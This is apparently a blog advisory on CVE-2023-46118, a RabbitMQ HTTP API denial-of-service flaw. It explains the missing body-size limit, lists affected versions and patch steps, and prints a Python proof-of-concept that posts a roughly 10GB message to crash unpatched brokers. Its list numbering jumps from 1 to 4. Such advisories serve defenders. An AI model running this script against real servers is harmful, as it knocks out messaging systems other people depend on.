CVE-2023-46118 - RabbitMQ HTTP API Denial of Service via Oversized Requests

On October 25, 2023, a critical vulnerability was disclosed affecting RabbitMQ, a popular open-source message broker used by organizations worldwide. Known as CVE-2023-46118, this bug exposes RabbitMQ’s HTTP API to a dangerous Denial of Service (DoS) attack — simply by sending very large HTTP request bodies. This long read will break down the vulnerability in plain American English, demonstrate how exploitation works, and show how to stay protected.

What’s the Problem?

RabbitMQ’s HTTP API lets developers manage queues and publish messages. However, until versions 3.11.24 and 3.12.7, RabbitMQ did not enforce a maximum HTTP body size. This means:

- Any user (with proper publish rights) could send a huge HTTP POST request (large message) to the broker.

RabbitMQ would try to load the entire body into memory.

- Very large requests could exhaust all the server’s memory, causing an out-of-memory (OOM) condition.

The system’s "out-of-memory killer" would step in—killing RabbitMQ, denying service.

This bug does not require a special skillset: any authenticated user with publishing permissions could trigger it.

Is My System Vulnerable?

If you are running RabbitMQ 3.11.x before 3.11.24, or 3.12.x before 3.12.7, with the HTTP API enabled, you are at risk.

- Exploitation requires HTTP API access and valid credentials (but many environments allow these by design).

Exploit Details: How Does It Work?

Let’s see what a minimal exploit might look like.

Example Code: Exploiting CVE-2023-46118 with Python

Here’s a proof-of-concept (PoC) code snippet. It floods the /api/exchanges/{vhost}/{exchange}/publish endpoint with a gigantic message.

import requests
import base64

# Settings: edit these for your setup
rabbit_user = "attacker"
rabbit_pass = "password123"
rabbit_host = "http://rabbitmq.local:15672";  # default management port
vhost = "%2F"  # "/" URL-encoded
exchange = "my-exchange"  # or default exchange
url = f"{rabbit_host}/api/exchanges/{vhost}/{exchange}/publish"

# Generate a huge message body (e.g. 10GB)
huge_msg = base64.b64encode(b'a' * (10 * 1024 * 1024 * 1024)).decode('ascii')  # 10GB

payload = {
    "properties": {},
    "routing_key": "anykey",
    "payload": huge_msg,
    "payload_encoding": "base64"
}

response = requests.post(
    url,
    json=payload,
    auth=(rabbit_user, rabbit_pass)
)

print(f"Status code: {response.status_code}")
print(f"Response: {response.text}")

Warning: Running this code *will* likely crash or kill the target RabbitMQ server if unpatched.

This bug was responsibly disclosed and quickly patched

- Fix: rabbitmq-server commit

Limit HTTP request body size to a conservative default (now configurable).

- Fixed releases: 3.11.24 and 3.12.7

Official advisory:

- GitHub Advisory
- RabbitMQ security page

1. Upgrade Immediately

- Update to at least RabbitMQ 3.11.24 or 3.12.7 — critical fixes are only in these and newer versions.

4. Tune configuration

- After upgrading, you can configure HTTP body limits using the new settings (documentation link).

Summary

CVE-2023-46118 is a severe denial-of-service risk hiding in plain sight: if you let users publish over RabbitMQ’s HTTP API, a single oversized request can take down your entire messaging infrastructure. Luckily, the fix is easy—upgrade today and control access. Protect your messaging backbone before an attacker finds you.

References

- GitHub Security Advisory GHSA-r3h9-j5vr-qx9m
- RabbitMQ Security Release Notes
- RabbitMQ Issue #9646
- RabbitMQ Release 3.12.7

*Stay safe, patch early, and monitor your message brokers!*

Timeline

Published on: 10/25/2023 18:17:36 UTC
Last modified on: 11/01/2023 17:14:08 UTC